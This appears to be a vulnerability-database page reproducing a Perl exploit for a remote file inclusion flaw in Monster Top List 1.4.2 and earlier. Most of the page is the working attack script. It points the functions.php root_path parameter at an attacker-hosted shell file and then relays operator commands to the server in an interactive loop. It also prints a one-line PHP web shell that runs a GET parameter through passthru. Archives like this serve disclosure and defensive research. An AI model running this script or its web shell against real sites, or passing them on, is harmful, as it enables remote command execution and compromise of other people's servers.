Lucene search
K

Monster Top List <= 1.4.2 (functions.php root_path) RFI Exploit

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 17 Views

Monster Top List <= 1.4.2 RFI Exploit for functions.ph

Code

                                                #!/usr/bin/perl
#
# Monster Top List &#60;= 1.4.2 remote Command Execution Vulnerabilities
#
# Risk : High (Remote Code Execution)
#
# Url: http://www.monstertoplist.com
#
# Exploit:
#   http://site.com/[path]/sources/functions.php?root_path=[Evil_Script]
#
# (c)oded and f0und3d by fluffy_bunny
#
# Romanian Security Team .: hTTp://RSTZONE.NET :.
#
# t0 psyke[pwn]: &#34;y0ur c0de suqz. y0ur s1t3 suqz. y0u sm3ll 0f sh33p f3c3z. 3y3 th1nk y0u n33d t0
#                t4k3 4n 0nl1n3 w3b d3s1gn c0urz3 0r s0m3th1ng. fuqn d0rk.&#34;

use LWP::Simple;

print &#34;...........................[RST]...............................\n&#34;;
print &#34;.                                                             .\n&#34;;
print &#34;. Monster Top List &#60;= 1.4.2 RFI spl0it                        .\n&#34;;
print &#34;.                                                             .\n&#34;;
print &#34;...............................................................\n&#34;;
print &#34;.       Romanian Security Team -&#62; hTTp://RSTZONE.NET          .\n&#34;;
print &#34;.       [c]oded by fluffy_bunny - [email protected]             .\n&#34;;
print &#34;...............................................................\n\n&#34;;

my $kw3,$path,$shell,$conexiune,$cmd,$data ;


if ((!$ARGV[0]) || (!$ARGV[1])) { &usage;exit(0);}

$path = $ARGV[0];
chomp($path);
$shell = $ARGV[1];    
chomp($shell);
    
$path = $path.&#34;/sources/functions.php&#34;;


sub usage(){
    print &#34;Usage    : perl $0 host/path http://site.com/cmd.txt\n\n&#34;;
    print &#34;Example  : perl $0 http://127.0.0.1 http://site.com/cmd.txt\n\n&#34;;
    print &#39;Shell    : &#60;?php ob_clean();ini_set(&#34;max_execution_time&#34;,0);passthru($_GET[&#34;cmd&#34;]);die;?&#62;&#39;;
}

while ()  
{  
print &#34;[kw3rln].[rst] :~\$ &#34;;
chomp($cmd=&#60;STDIN&#62;);
if ($cmd eq &#34;exit&#34;) { exit(0);}

$kw3 = $path.&#34;?root_path=&#34;.$shell.&#34;?&cmd=&#34;.$cmd;
if ($cmd eq &#34;&#34;)     
  { print &#34;Enter your command !\n&#34;; }
else
  { $data=get($kw3); print $data ; }
}

# milw0rm.com [2007-03-20]

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation